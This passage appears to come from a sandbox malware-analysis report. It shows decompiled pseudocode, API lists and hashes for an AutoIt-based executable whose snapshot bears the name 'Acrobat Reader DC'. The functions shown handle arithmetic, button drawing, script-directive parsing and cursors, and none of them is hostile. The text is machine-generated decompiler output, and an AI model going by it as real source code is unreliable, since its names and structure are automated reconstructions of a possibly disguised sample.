                                  							}
                                  						}
                                  						_t141 = _v24;
                                  						_a12 = _a12 & 0x00000000;
                                  						_t88 = _t129 + _t141;
                                  						if(_t88 < _t129 || _t88 < _t141) {
                                  							_a12 = 1;
                                  						}
                                  						_t82[1] = _t88;
                                  						if(_a12 != 0) {
                                  							_t101 = _t101 + 1;
                                  							_t82[2] = _t101;
                                  						}
                                  						_v12 = _v12 & 0x00000000;
                                  						_t104 = _t101 + _v20 + _t101 + _v20 | _t88 >> 0x0000001f;
                                  						_t117 = _t116 + _t116;
                                  						_t83 = _t88 + _t88 | _t116 >> 0x0000001f;
                                  						_t82[2] = _t104;
                                  						_v16 = _t104;
                                  						_a12 = _t104;
                                  						 *_t82 = _t117;
                                  						_t82[1] = _t83;
                                  						_t144 =  *_a4;
                                  						_t95 = _t117 + _t144;
                                  						_v28 = _t144;
                                  						if(_t95 < _t117 || _t95 < _t144) {
                                  							_v12 = 1;
                                  						}
                                  						 *_t82 = _t95;
                                  						if(_v12 != 0) {
                                  							_t51 = _t83 + 1; // 0x1
                                  							_t119 = _t51;
                                  							_t145 = 0;
                                  							if(_t119 < _t83 || _t119 < 1) {
                                  								_t145 = 1;
                                  							}
                                  							_t83 = _t119;
                                  							_t82[1] = _t119;
                                  							if(_t145 != 0) {
                                  								_t121 = _v16 + 1;
                                  								_a12 = _t121;
                                  								_t82[2] = _t121;
                                  							}
                                  						}
                                  						_a8 = _a8 - 1;
                                  						_a4 = _a4 + 1;
                                  						_t82[1] = _t83;
                                  						_t82[2] = _a12;
                                  					} while (_a8 > 0);
                                  					_t83 = 0;
                                  					goto L27;
                                  				}
                                  			}


































                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N@
                                  • API String ID: 0-1509896676
                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E004417BF(intOrPtr _a4, struct HWND__** _a8) {
                                  				signed int _v32;
                                  				long _v36;
                                  				struct tagRECT _v52;
                                  				struct tagRECT _v68;
                                  				void* _v72;
                                  				WCHAR* _v76;
                                  				struct HBRUSH__* _v80;
                                  				long _v84;
                                  				int _v88;
                                  				long _v92;
                                  				int _v96;
                                  				void* _v100;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t104;
                                  				long _t106;
                                  				long _t108;
                                  				long _t111;
                                  				void* _t113;
                                  				WCHAR* _t127;
                                  				struct HBRUSH__* _t160;
                                  				signed int _t168;
                                  				struct HWND__** _t169;
                                  				int _t170;
                                  				WCHAR* _t171;
                                  				signed int _t191;
                                  				struct HDC__* _t213;
                                  				intOrPtr _t217;
                                  				void* _t219;
                                  
                                  				_t217 = _a4;
                                  				if( *0x49751c == 0) {
                                  					_t104 =  *(_t217 + 0x10);
                                  					_t213 =  *(_t217 + 0x18);
                                  					_t168 = _t104 & 0x00000006;
                                  					_v52.right = _t104 & 0x00000010;
                                  					_v32 = _t168;
                                  					_v52.top.left = _t104 & 0x00000001;
                                  					__eflags = _t168;
                                  					if(_t168 == 0) {
                                  						_t106 = _a8[0x12];
                                  						__eflags = _t106 - 0xffffffff;
                                  						if(_t106 == 0xffffffff) {
                                  							_t106 = GetSysColor(0x12);
                                  							goto L6;
                                  						}
                                  					} else {
                                  						_t106 = GetSysColor(0xe);
                                  						L6:
                                  					}
                                  					_v52.top.left = SetTextColor(_t213, _t106);
                                  					_t108 = _a8[0x11];
                                  					__eflags = _t108 - 0xffffffff;
                                  					if(_t108 != 0xffffffff) {
                                  						_v68.top.left = CreateSolidBrush(_t108);
                                  						_t111 = _a8[0x11];
                                  					} else {
                                  						_v68.right.left = GetSysColorBrush(0xf);
                                  						_t111 = GetSysColor(0xf);
                                  					}
                                  					_v52.right = SetBkColor(_t213, _t111);
                                  					_t113 = SelectObject(_t213, _v72);
                                  					__eflags = _v76;
                                  					_v68.bottom = _t113;
                                  					_v52.top.left =  *(_t217 + 0x1c);
                                  					_v52.right =  *(_t217 + 0x20);
                                  					_v52.bottom =  *(_t217 + 0x24);
                                  					_v36 =  *(_t217 + 0x28);
                                  					if(_v76 == 0) {
                                  						__eflags = _v72;
                                  						if(_v72 != 0) {
                                  							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                                  						}
                                  						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
                                  					} else {
                                  						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                                  						_t160 = CreateSolidBrush(GetSysColor(0x10));
                                  						_v68.left = _t160;
                                  						FrameRect(_t213,  &_v52, _t160);
                                  						DeleteObject(_v68.left);
                                  					}
                                  					__eflags = _v76;
                                  					_v52.top.left =  *(_t217 + 0x1c);
                                  					_v52.right =  *(_t217 + 0x20);
                                  					_v52.bottom =  *(_t217 + 0x24);
                                  					_v36 =  *(_t217 + 0x28);
                                  					if(_v76 == 0) {
                                  						__eflags = _v72;
                                  						if(_v72 == 0) {
                                  							InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
                                  						} else {
                                  							InflateRect( &(_v52.top), 0xfffffffd, 0xfffffffd);
                                  						}
                                  						_v52.top.left = _v52.top.left - 1;
                                  						_t51 =  &(_v52.right);
                                  						 *_t51 = _v52.right - 1;
                                  						__eflags =  *_t51;
                                  					} else {
                                  						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
                                  					}
                                  					FillRect(_t213,  &(_v52.top), _v80);
                                  					__eflags = _v88;
                                  					if(_v88 != 0) {
                                  						L23:
                                  						_v68.right.left = _v68.right.left + 2;
                                  						_t58 =  &(_v68.bottom);
                                  						 *_t58 = _v68.bottom + 2;
                                  						__eflags =  *_t58;
                                  					} else {
                                  						__eflags = _t168;
                                  						if(_t168 != 0) {
                                  							goto L23;
                                  						}
                                  					}
                                  					_t169 = _a8;
                                  					_v88 = 0x105;
                                  					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
                                  					if(__eflags == 0) {
                                  						_v88 = 0x125;
                                  					}
                                  					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
                                  					_t170 = _t65;
                                  					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
                                  					_t127 = E004115D7(_t213, _t217, __eflags);
                                  					_v76 = _t127;
                                  					GetWindowTextW( *_a8, _t127, _t170);
                                  					_t171 = _v76;
                                  					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
                                  					__eflags = _v72;
                                  					if(_v72 != 0) {
                                  						_v52.left =  *(_t217 + 0x24);
                                  						_t191 =  *(_t217 + 0x20) + 1;
                                  						__eflags = _t191;
                                  						_v52.top.left =  *(_t217 + 0x28);
                                  						_v68.right.left =  *(_t217 + 0x1c) + 1;
                                  						_v68.bottom = _t191;
                                  						SetTextColor(_t213, GetSysColor(0x11));
                                  						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
                                  					}
                                  					__eflags = _v84;
                                  					if(_v84 != 0) {
                                  						_v68.right.left =  *(_t217 + 0x1c);
                                  						_v68.bottom =  *(_t217 + 0x20);
                                  						_v52.left =  *(_t217 + 0x24);
                                  						_v52.top.left =  *(_t217 + 0x28);
                                  						_t219 = CreateSolidBrush(0);
                                  						FrameRect(_t213,  &(_v68.top), _t219);
                                  						DeleteObject(_t219);
                                  						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
                                  						DrawFocusRect(_t213,  &_v68);
                                  					}
                                  					_push(_t171);
                                  					E004111DC();
                                  					SelectObject(_t213, _v68);
                                  					DeleteObject(_v100);
                                  					SetTextColor(_t213, _v92);
                                  					SetBkColor(_t213, _v84);
                                  					return 1;
                                  				} else {
                                  					return E004308EF(_t217, _a8);
                                  				}
                                  			}

































                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32 ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32 ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 69173610-0
                                  • Opcode ID: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E00403A20(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                  				char _v8196;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				intOrPtr _t49;
                                  				intOrPtr _t50;
                                  				intOrPtr _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				signed int _t65;
                                  				void* _t67;
                                  				intOrPtr _t68;
                                  				signed int _t72;
                                  				intOrPtr _t76;
                                  				signed int _t86;
                                  				char* _t96;
                                  				intOrPtr _t101;
                                  				void* _t116;
                                  				intOrPtr* _t117;
                                  				void* _t119;
                                  				short* _t120;
                                  				signed int _t121;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t124;
                                  				void* _t125;
                                  				void* _t126;
                                  				void* _t127;
                                  				void* _t128;
                                  				void* _t129;
                                  				void* _t130;
                                  
                                  				_t134 = __fp0;
                                  				_t98 = __ecx;
                                  				E00422240(0x2004);
                                  				_t120 = _a4;
                                  				if( *_t120 == 0x23) {
                                  					_t96 = __ecx;
                                  					_t44 = E0041341F(_t120, L"#notrayicon", 0xb);
                                  					_t124 = _t123 + 0xc;
                                  					__eflags = _t44;
                                  					if(_t44 != 0) {
                                  						_t45 = E0041341F(_t120, L"#requireadmin", 0xd);
                                  						_t125 = _t124 + 0xc;
                                  						__eflags = _t45;
                                  						if(_t45 != 0) {
                                  							_t46 = E0041341F(_t120, L"#NoAutoIt3Execute", 0xd);
                                  							_t126 = _t125 + 0xc;
                                  							__eflags = _t46;
                                  							if(_t46 != 0) {
                                  								_t47 = E0041341F(_t120, L"#OnAutoItStartRegister", 0x16);
                                  								_t127 = _t126 + 0xc;
                                  								__eflags = _t47;
                                  								if(__eflags != 0) {
                                  									_t48 = E0041341F(_t120, L"#include-once", 0xd);
                                  									_t128 = _t127 + 0xc;
                                  									__eflags = _t48;
                                  									if(_t48 != 0) {
                                  										_t49 = E0041341F(_t120, L"#include", 8);
                                  										_t129 = _t128 + 0xc;
                                  										__eflags = _t49;
                                  										if(_t49 != 0) {
                                  											_t50 = E0041341F(_t120, L"#comments-start", 0xf);
                                  											_t130 = _t129 + 0xc;
                                  											__eflags = _t50;
                                  											if(__eflags == 0) {
                                  												L28:
                                  												_t117 = _a12;
                                  												_a4 = 1;
                                  												while(1) {
                                  													__eflags = E0046FD6C(__eflags, _a16, _t120);
                                  													if(__eflags == 0) {
                                  														break;
                                  													}
                                  													 *_t117 =  *_t117 + 1;
                                  													E00444BBB(_t98, __eflags, _t120);
                                  													E00444B5F(_t98, _t120);
                                  													_t58 = E0041341F(_t120, L"#comments-start", 0xf);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t58;
                                  													if(__eflags == 0) {
                                  														L36:
                                  														_a4 = _a4 + 1;
                                  														continue;
                                  													}
                                  													_t59 = E0041341F(_t120, L"#cs", 3);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t59;
                                  													if(__eflags == 0) {
                                  														goto L36;
                                  													}
                                  													_t60 = E0041341F(_t120, L"#comments-end", 0xd);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t60;
                                  													if(_t60 == 0) {
                                  														L34:
                                  														_t62 = _a4 - 1;
                                  														_a4 = _t62;
                                  														__eflags = _t62;
                                  														if(__eflags > 0) {
                                  															continue;
                                  														}
                                  														return 1;
                                  													}
                                  													_t64 = E0041341F(_t120, L"#ce", 3);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t64;
                                  													if(__eflags != 0) {
                                  														continue;
                                  													}
                                  													goto L34;
                                  												}
                                  												__eflags = _a4;
                                  												if(__eflags <= 0) {
                                  													L5:
                                  													return 1;
                                  												}
                                  												E00454014(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
                                  												return 0;
                                  											}
                                  											_t65 = E0041341F(_t120, L"#cs", 3);
                                  											_t130 = _t130 + 0xc;
                                  											__eflags = _t65;
                                  											if(__eflags != 0) {
                                  												goto L5;
                                  											}
                                  											goto L28;
                                  										}
                                  										_push( &_v8196);
                                  										_push(_t120 + 0x10);
                                  										_push(_t96);
                                  										_t67 = E00444BFC();
                                  										_t101 = _a8;
                                  										__eflags = _t67 - 1;
                                  										_t68 =  *_a12;
                                  										if(__eflags != 0) {
                                  											E00454014(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
                                  											return 0;
                                  										}
                                  										_push(_t68);
                                  										_push(_t120);
                                  										_push(_t101);
                                  										_push(E00410190(_t96,  &_v8196, _t116));
                                  										_push( &_v8196);
                                  										_push(_t96);
                                  										_t72 = E004033C0( &_v8196, __fp0);
                                  										__eflags = _t72;
                                  										return 0 | _t72 != 0x00000000;
                                  									}
                                  									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
                                  									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
                                  										goto L5;
                                  									}
                                  									_t121 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_t76 = E004114AB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
                                  										_t128 = _t128 + 8;
                                  										__eflags = _t76;
                                  										if(_t76 == 0) {
                                  											break;
                                  										}
                                  										_t121 = _t121 + 1;
                                  										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
                                  										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
                                  											continue;
                                  										}
                                  										return 1;
                                  									}
                                  									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
                                  									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
                                  								}
                                  								_t122 = E00410160(_t120 + 0x2c, __eflags);
                                  								E00444B5F(_t98, _t122);
                                  								E00444BBB(_t98, __eflags, _t122);
                                  								_t86 = E004111C1(_t122);
                                  								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
                                  								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
                                  									_push(_t122);
                                  								} else {
                                  									_t8 = _t122 + 2; // 0x2
                                  									_t119 = _t8;
                                  									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
                                  									E00444B5F(0, _t119);
                                  									E00444BBB(0, __eflags, _t119);
                                  									_push(_t119);
                                  								}
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
                                  								_push(_t122);
                                  								E004111DC();
                                  								return 1;
                                  							}
                                  							 *((char*)(_t96 + 2)) = 1;
                                  							return 1;
                                  						}
                                  						 *((char*)(_t96 + 1)) = 1;
                                  						return 1;
                                  					}
                                  					 *_t96 = 1;
                                  					goto L5;
                                  				}
                                  				return 3;
                                  			}








































                                  0x004284b2
                                  0x004284b7
                                  0x004284bd
                                  0x004284c2
                                  0x004284c2
                                  0x004284d0
                                  0x004284d2
                                  0x004284d3
                                  0x00000000
                                  0x004284db
                                  0x00428463
                                  0x00000000
                                  0x00428467
                                  0x00428441
                                  0x00000000
                                  0x00428445
                                  0x00428420
                                  0x00000000
                                  0x00428420
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430737(signed int _a4) {
                                  				signed int _t4;
                                  
                                  				_t4 = _a4;
                                  				if(_t4 > 0x10) {
                                  					L16:
                                  					return SetCursor(LoadCursorW(0, 0x7f00));
                                  				} else {
                                  					switch( *((intOrPtr*)(_t4 * 4 +  &M004308AB))) {
                                  						case 0:
                                  							return SetCursor(LoadCursorW(0, 0x7f89));
                                  							goto L17;
                                  						case 1:
                                  							__eax = LoadCursorW(0, 0x7f8a);
                                  							return __eax;
                                  							goto L17;
                                  						case 2:
                                  							goto L16;
                                  						case 3:
                                  							__eax = LoadCursorW(0, 0x7f03);
                                  							return __eax;
                                  							goto L17;
                                  						case 4:
                                  							__eax = LoadCursorW(0, 0x7f8b);
                                  							return __eax;
                                  							goto L17;
                                  						case 5:
                                  							__eax = LoadCursorW(0, 0x7f01);
                                  							return __eax;
                                  							goto L17;
                                  						case 6:
                                  							__eax = LoadCursorW(0, 0x7f88);
                                  							return __eax;
                                  							goto L17;
                                  						case 7:
                                  							__eax = LoadCursorW(0, 0x7f86);
                                  							return __eax;
                                  							goto L17;
                                  						case 8:
                                  							__eax = LoadCursorW(0, 0x7f83);
                                  							return __eax;
                                  							goto L17;
                                  						case 9:
                                  							__eax = LoadCursorW(0, 0x7f85);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xa:
                                  							__eax = LoadCursorW(0, 0x7f82);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xb:
                                  							__eax = LoadCursorW(0, 0x7f84);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xc:
                                  							__eax = LoadCursorW(0, 0x7f04);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xd:
                                  							__eax = LoadCursorW(0, 0x7f02);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xe:
                                  							return SetCursor(0);
                                  							goto L17;
                                  					}
                                  				}
                                  				L17:
                                  			}





                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E004308EF(struct HBRUSH__* _a4, struct HWND__** _a8) {
                                  				long _v8;
                                  				long _v12;
                                  				signed int _v16;
                                  				int _v20;
                                  				signed int _v24;
                                  				WCHAR* _v28;
                                  				void* _v32;
                                  				void* _v36;
                                  				void* _v40;
                                  				long _v44;
                                  				struct tagRECT _v60;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t72;
                                  				signed int _t73;
                                  				long _t74;
                                  				long _t75;
                                  				long _t76;
                                  				long _t78;
                                  				long _t79;
                                  				void* _t80;
                                  				signed int _t93;
                                  				WCHAR* _t95;
                                  				struct HWND__** _t117;
                                  				struct HBRUSH__* _t149;
                                  				WCHAR* _t150;
                                  				struct HDC__* _t152;
                                  				signed int _t159;
                                  
                                  				_t149 = _a4;
                                  				_t72 =  *(_t149 + 0x10);
                                  				_t152 =  *(_t149 + 0x18);
                                  				_t73 = _t72 & 0x00000006;
                                  				_v24 = _t72 & 0x00000010;
                                  				_v16 = _t73;
                                  				if(_t73 == 0) {
                                  					_t117 = _a8;
                                  					_t74 =  *(_t117 + 0x48);
                                  					__eflags = _t74 - 0xffffffff;
                                  					if(__eflags == 0) {
                                  						_t74 = GetSysColor(0x12);
                                  					}
                                  					_t75 = SetTextColor(_t152, _t74);
                                  				} else {
                                  					_t75 = SetTextColor(_t152, GetSysColor(0xe));
                                  					_t117 = _a8;
                                  				}
                                  				_v8 = _t75;
                                  				_t76 =  *(_t117 + 0x44);
                                  				if(_t76 != 0xffffffff) {
                                  					_a4 = CreateSolidBrush(_t76);
                                  					_t78 =  *(_t117 + 0x44);
                                  				} else {
                                  					_a4 = GetSysColorBrush(0xf);
                                  					_t78 = GetSysColor(0xf);
                                  				}
                                  				_v12 = _t78;
                                  				if(_v16 == 0) {
                                  					_t79 = 0x743c00;
                                  				} else {
                                  					_t79 = GetSysColor(0x11);
                                  				}
                                  				_t80 = CreatePen(0, 1, _t79);
                                  				_v40 = _t80;
                                  				_v36 = SelectObject(_t152, _t80);
                                  				_v44 = SetBkColor(_t152, _v12);
                                  				_v32 = SelectObject(_t152, _a4);
                                  				_v60.top =  *(_t149 + 0x20);
                                  				_v60.left =  *(_t149 + 0x1c);
                                  				_v60.right =  *(_t149 + 0x24);
                                  				_v60.bottom =  *(_t149 + 0x28);
                                  				InflateRect( &_v60, 0xffffffff, 0xffffffff);
